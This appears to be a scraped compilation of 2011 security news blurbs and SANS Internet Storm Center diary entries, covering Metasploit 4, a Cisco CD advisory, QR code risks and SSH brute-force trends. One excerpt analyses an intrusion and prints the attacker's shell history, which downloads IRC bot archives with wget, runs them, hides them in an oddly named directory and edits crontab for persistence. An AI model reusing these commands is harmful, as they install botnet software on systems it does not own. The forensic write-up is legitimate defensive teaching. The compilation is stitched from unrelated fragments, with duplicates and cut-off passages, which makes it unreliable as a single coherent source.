Security product provider Rapid7 has updated its widely used open-source Metasploit exploitation framework, expanding the software so it supports enterprise IT security staff as well as its core audience of penetration testers.

Intel is opening up two research centers at Carnegie Mellon university that will develop technology around delivery of real-time information to consumer electronics aggregated from millions of cloud sources, the company said on Wednesday.

When hackers broke into Google's computer network nearly two years ago, their first step was to take over Microsoft Windows machines running in the company's China offices. Would Google have been better off had those workers been running the Mac?

Google chief legal officer David Drummond Wednesday issued a stinging rebuke of what he called 'bogus patent' attacks on the Android operating system by major competitors like Apple, Oracle and Microsoft.

A $66.6 million Oracle ERP project undertaken by Pennsylvania's Liquor Control Board has been marred by inflated costs, staffing woes and operational problems, according to the state's auditor general.

I just wrote a quick note about the Cisco warranty CD mixup. While writing that, it came to me that currently quite a few of our readers may be visiting Las Vegas for this summers security drink fest. Historically, this has been a time to play various pranks on the audience of these conferences. In the past, fake ATMs, odd wifi networks, weird BGP issues and other tricks were mentioned.
One thing to look out for this year may be QR codes. 25% of internet users are now apparently using mobile devices. Many of them have known vulnerabilities the owner didn't bother to patch yet. At Vegas this week, you may prefer using your mobile device via 3G networks to avoid the notoriously unsafe Wifi networks offered at these conferences.
But there is one problem with mobile devices:The keyboard typically stinks. In particular on cell phones. To help you with that, we have QR codes. QR codes are bar codes that encode text and are commonly understood by mobile devices. Take a picture of it, and an app will take you to the encoded URL. Sadly, most people are not all that good in encoding barcode, and have no idea what they are entering. Compare it to handing your phone to a friend and telling them to type for you.
These barcodes can link directly to browser exploits, or could include other malicious content to manipulate your phone. If you spot a malicious code, let us know ... most of the applications will tell you what URLthey are going to open up before they actually load it (similar to some of the short code URLs).

Cisco released a somewhat unusual advisory today [1]. instead of talking about a vulnerability in a Cisco product, the advisory warns of a CD shipped by Cisco between December 2010 and August 2011 (= now..).
The CD itself does not include any malware, but documents on the CD, if opened in a browser, may include content from known malicious sites and could have lead to exploitation of the user.
According to Cisco, the site in question is down for some time, and they are not aware of Cisco customers being affected by content from the malicious site. But with all the talk about malicious USB sticks and people focusing counter measures on preventing the use of unauthorized USB sticks, CDs/DVDs certainly should be considered too.
If you are in Vegas this week for Blackhat/Defcosn:Be on the lookup for certified pre-pw0n3d vendor software distributed on USB sticks or CDs. (or QR codes? maybe I should do a diary about that)
[1] http://www.cisco.com/warp/public/707/cisco-sr-20110803-cd.shtml
------

In what may be a preview of what will happen in the United States, the Australian telecommunications giant Telstra late last month released its plan to bring a close to the old telephone world. Telstra announced it will decommission its copper customer access network and stop offering fixed line telephone service to retail customers after July 1, 2018.

Hacker groups such as Anonymous and Lulz Security may need to be monitored more closely in the event they are assisted by other hackers with higher skill levels and decide to strike critical infrastructure.

Thanks to Pat for pointing out a sharp increase in the number of sources scanning for port 3389 [1].
Port 3389 / TCP is used by Microsoft Terminal Services, and has been a continuing target of attacks. If you have any logs you want to share, please submit them via our contact page . In particular if you observed anything different the last couple days.

Security vendor McAfee published a detailed report on Tuesday about a hacking group that penetrated 72 companies and organizations in 14 countries since 2006 in a massive operation that stole national secrets, business plans and other sensitive information.

Before the Internet, passwords played only a tiny role in everyday life. Think about it: Except for your ATM PIN, what important codes did you need to remember? Probably none. But now, you can’t click a link without hitting another site that requires a password. Doesn’t matter if it’s a big-name destination like Google Docs or Mint.com, or a smaller, more private site such as your local library or company intranet. You want in? Password, please.

Maxthon (free) is probably the best Web browser you've never heard of. I reviewed it favorably in the past, when it resembled a cousin of Internet Explorer 7. Since then, it's changed drastically. Maxthon includes two built-in rendering engines, Webkit and Trident, and you can switch between them with a click,which means no website should be incompatible when browsing. One of the best uses for this is to visit ancient sites (like for work) that only work with Internet Explorer.

Industry observers say that a stagnant laptop market could be reinvigorated by the energy-efficient ARM chips that power today's tablets. What do you think? Will ARM chips provide a shot in the arm to laptop sales, or has the post-PC era already arrived?

Security vendor McAfee published a detailed report on Tuesday about a hacking group that penetrated 72 companies and organizations in 14 countries since 2006 in a massive operation that stole national secrets, business plans and other sensitive information.

LAS VEGAS -- Not only are SCADA systems used to run power plants and other
critical infrastructure lacking many security precautions to keep hackers out,
operators sometimes practically advertise their wares on Google search,
according to a demo today during a Black Hat conference...

The Department of Defense has released its long-awaited "Department of
Defense Strategy for Operating in Cyberspace" [PDF], as well as a
website devoted to selling that strategy. The strategy has faced no
shortage of criticism over the last couple weeks, from VCJS Gen....

Documents containing personal information of approximately 1,500
Mills-Peninsula Health Services patients were removed from the facility
over the course of a year and taken home by a mailroom employee,
according to a hospital spokeswoman.

The worker, who has since been terminated, took the documents between
November 2009 and...

./run
We are not quite sure whether any of the above exploits was successful. The id command, or the exploit itself, would have told the attacker whether he got lucky, but there aren't any traces in the shell history file that would tell us either way.
In any case .. follows Phase #3a: The attacker installs some goodies. virus.tar isn't really a virus, it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses Nano to edit the config file, which tells us that he isn't all that experienced on Unix. A real Unix hacker would most likely use vi, because vi is present on all Unix flavors and versions. Note also how he calls the IRC bot Evolution when he starts it, likely hoping that an admin would overlook it in a casual investigation.
/sbin/ifconfig -a | grep inet

wget http://f......com/storm12/virus.tar

tar xvf virus.tar

rm -rf virus.tar

cd virus

ls -a

nano start

nano inst

chmod +x *

./autorun

./start Evolution
Phase#3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called (single space). If you want to search for such directories on your system, try this

#find / -name
mkdir

cd

ls -a

wget http://c.......org/egg.tgz

cd

tar zxvf egg.tgz

rm -rf egg.tgz

cd .access.log

ls -a

chmod +x *

./eggdrop -m bot1.conf

ls -a

cd scripts

nano respond.tcl

pwd

Phase #4: The attacker wants to make sure that access can be re-gained, and configures the cron tab to re-start some of his processes automatically on a schedule.
crontab -l

We received an email from a reader today about a link on his wife's Facebook wall. The link indicated that a friend had tagged her. When he tried to remove the post from her wall it would not allow removal.He reported it as spam. Apparently a friend of hers clicked on the link and got infected. The link point to bitlyDOTcom and have random file names. Let this serve as a reminder to everyone not to click on links until you have checked out the source. As for Bitly - I would use extreme caution with any links identified as source bitlyDOTcom.This is a website redirector that allows the link to be shortened, shared and tracked. Even if you don't get malicious programs installed, do you really want to be tracked????
Thanks to our reader Paul for the email reminder and information.
Deb Hale
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

On Friday an article appeared on techdirt.com claiming that Pakistan is trying to ban encryption under their new Telco law.

In the article the author suggests that encryption is really just a form of speech and that trying to ban encryption is

like trying to ban language.

I find the banning of encryption interesting in light of the number of United States compliance standards and laws governing

the use of encryption to protect financial data (PCI) and medical records (HIPPA) among them. These laws require that the

data be protected in place and in transit. Does the proposed Telco Law in Pakistan mean that the US will not be able to

exchange data with them? How will laws like this effect world trade?

All of the work that has been done to establish world economy could come crashing down if laws like this stand. It will be

interesting to see how this develops. Many businesses today operate in the Internet, many are moving to the cloud. These businesses and organizations need to protect their data to protect their financial stability. So in this Handler's opinion, ban encryption will never happen. Others may not agree with me. Let me hear from you. Can we or should we ban encryption?

When Lion first appeared in the Apple App store most of probably blindly click YESYES YESlike good little Apple zombies (me included!)... After some updates and fiddling withApplications to get them working I started to take a hard look at what was now leaving my devices. A new series of packets on port TCP 5223 was leaving outbound from my network stack and thanks to Little Snitch [1] I was in control of it.

On Apple's support site [2] You will find a list of well know TCP/UDPports used by Apple operating systems and according to their site:

We all know that web applications are the new firewall. However, so far we had a hard time collecting web application logs. The hard part is to balance ease of install of a sensor (without disrupting the web application), fidelity of the log information and privacy.
With firewall logs, it is pretty simple. A rejected packet in a firewall has very little information and privacy isn't a big issue. Web application are different as the actual meat of the log event is in the request content, which may contain personal information. Parsing web logs isn't so easy either. Administrators frequently customize log formats for special purposes.
To balance these different issues we decided to focus on errors, but instead of parsing logs, we set up a little php script that you can add to your error page. In its current form, the script will work with PHPweb servers (tested with Apache) that support the curl extension. Curl is installed by default in current versions of PHP.
Now all you need is an error page. In Apache, just use the ErrorDocument configuration directive. For example:

ErrorDocument 404 /error.html

Will redirect users to /error.html in case of a 404 error [1]. You may already have a page like that configured. All you need to do is add the php snippet to the end, sending us the intended URL, the user agent and the IPaddress of the client access the missing page.
The hope is to collect data from automated probes, similar in how DShield's firewall logs reflect portscan activity.
In particular if you are running a personal / home web server:Please consider adding the collector script.
Once we get a few submitters, we will start adding continuously updated reports to the site, just like we do for the DShield data. However, we can't do this until we have at least a dozen submitters (better 100 or more) . We can not publish one off errors as they will likely be specific to your site and again could cause privacy issues.
Why do we only support PHP? Well, that's the language I know. Feel free to submit a .Net/Java/Ruby/Perl or whatever version of the script.
Simple steps to sign up:

Citrix has identified a vulnerability in the XenApp and XenDesktop which could potentially be exploited by sending a well crafted packet to the XML vulnerable component. The code will run with the privileges of the service.
Citrix has posted a list of versions vulnerable to this issue with the hotfixes available here.
[1] http://support.citrix.com/article/CTX129430

A little while ago I asked for some SSH logs and as per usual people responded with gusto. So first of all thanks to all of those that provided logs, it was very much appreciated. Looking through the data it does look like everything is pretty much the same as usual. Get a userid, guess with password1, password2, password3, etc.

One variation did show. One of the log files showed that instead of the password changing the userid was changed. So pick a password and try it with userid1, userid2, userid3, etc, then pick password2 and rinse lather and repeat. Some of the other log files may have showed the same, but not all log files had userid and passwords available.

A number of the IP addresses showed that they were using the same password list, indicating that either they were being generated by the same tool or might be part of the same bot net. Quite a few IP addresses showed up in different logs submitted.

The most common userids were, not unexpectedly, root, admin, administrator, mysql, oracle, nagios. A few more specific userids do creep in, but most are the standard ones.

So not earth shattering or even mildly surprising, but sometimes it is good to know that things haven't changed, much.

As for the attacking IPs. You can find the unique IPaddresses performing SSHattacks here http://www.shearwater.com.au/uploads/files/MH/SSH_attacking_IPs.txt
A number of the logs were provided by the kippo SSH honeypot, which looks like it is well worth running if you want to collect your own info.
Thanks again and if Imanage to dig out anything further I'll keep you up to date.
Mark
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.

One of my favourite tools has to be Metasploit and version 4 has been released and is available for download.
Updating an existing instance is a cinch, just run the msfupdate or SVNand you should be good to go. Alternatively you can get fresh install files from the metasploit web site. More info here -- https://community.rapid7.com/community/metasploit/blog/2011/08/01/metasploit-40-released?utm_source=feedburnerutm_medium=feedutm_campaign=Feed%3A+metasploit%2Fblog+%28Metasploit+Blog%29
Enjoy.

Over the past year, the median cost of cybercrime increased by 56%, and
now costs companies an average of $6 million per year.

That finding comes from Ponemon Institute, which on Tuesday released its
Second Annual Cost of Cyber Crime Study, sponsored by HP ArcSight. For
the study, Ponemon questioned 50 U.S.-based businesses,...